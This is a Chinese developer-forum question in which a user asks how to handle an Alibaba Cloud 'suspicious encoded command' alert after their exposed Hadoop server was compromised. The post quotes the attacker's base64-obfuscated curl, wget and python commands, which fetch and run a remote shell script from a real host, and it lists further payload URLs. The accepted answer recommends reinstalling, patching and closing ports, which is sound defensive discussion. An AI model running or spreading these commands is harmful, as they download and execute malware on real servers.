lovewxm1993 2022-11-19 10:36 采纳率: 100%
浏览 48
已结题

阿里云可疑编码命令如何解决

问题遇到的现象和发生背景

阿里云提示“可疑编码命令”

img


这些代码不是我运行的。是我在安装hadoop之后,开放了公网端口8088、50070之后半小时被执行了代码,也没有提示有异常设备用root登录过此服务器。

用代码块功能插入代码,请勿粘贴截图

代码如下


/bin/bash -c 
if type curl >/dev/null; 
then echo Y3VybCAtZnNTTCBodHRwOi8va2lcXHNcXHMuYS1kXFxvZy50XFxvXHAvYjJmNjI4L2guc2gK|base64 -d|bash|bash; fi;

if type wget >/dev/null; 
then echo d2dldCAtcSAtTy0gIGh0dHA6Ly9raVxcc1xccy5hLWRcXG9nLnRcXG9ccC9iMmY2MjgvaC5zaAo=|base64 -d|bash|bash; fi;

if type python >/dev/null;then 
echo cHl0aG9uIC1jICJpbXBvcnQgdXJsbGliMjsgcHJpbnQgdXJsbGliMi51cmxvcGVuKCdodHRwOi8va2lcXHNcXHMuYS1kXFxvZy50XFxvXHAvaC5zaCcpLnJlYWQoKSIgPi4xO2NobW9kICt4IC4xOy4vLjEK|base64 -d|bash; fi
我的解答思路和尝试过的方法

1.将这个base64密文解码后指向一个url
kiss.a-dog.top
对应的ip为221.122.57.40
2.指向一个sh文件为 http://221.122.57.40/b2f628/h.sh
这个文件可以下载过来
3.打开这个sh文件,发现新链接http://221.122.57.40/b2f628/d/ar.sh
4.打开ar.sh文件,发现内部有两个下载内容为http://221.122.57.40/b2f628/m/xm.tar

我想要达到的结果

1.这个些代码实现了什么样的功能?
2.既然以及运行了上述代码,如何做才能消除其影响?
3.如何防护服务器,防止类似情况发生?

  • 写回答

2条回答 默认 最新

  • 游一游走一走 2022-11-19 11:08
    关注
    1. 里面的东西如果不重要建议重装,这个命令应该是启动项,可能已经下载了其他命令到计算机了
    2. 重装后立刻yum update更新整个系统
    3. 使用最新版的hadoop
    4. 关闭不用的端口,如果一定要开放端口,改变下默认端口,同时你的出口IP如果固定可以开ip白名单给指定端口
    5. 如果能使用docker部署就用docker部署
    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(1条)

报告相同问题?

问题事件

  • 系统已结题 11月27日
  • 已采纳回答 11月19日
  • 赞助了问题酬金15元 11月19日
  • 修改了问题 11月19日
  • 展开全部

悬赏问题

  • ¥20 机器学习能否像多层线性模型一样处理嵌套数据
  • ¥20 西门子S7-Graph,S7-300,梯形图
  • ¥50 用易语言http 访问不了网页
  • ¥50 safari浏览器fetch提交数据后数据丢失问题
  • ¥15 matlab不知道怎么改,求解答!!
  • ¥15 永磁直线电机的电流环pi调不出来
  • ¥15 用stata实现聚类的代码
  • ¥15 请问paddlehub能支持移动端开发吗?在Android studio上该如何部署?
  • ¥20 docker里部署springboot项目,访问不到扬声器
  • ¥15 netty整合springboot之后自动重连失效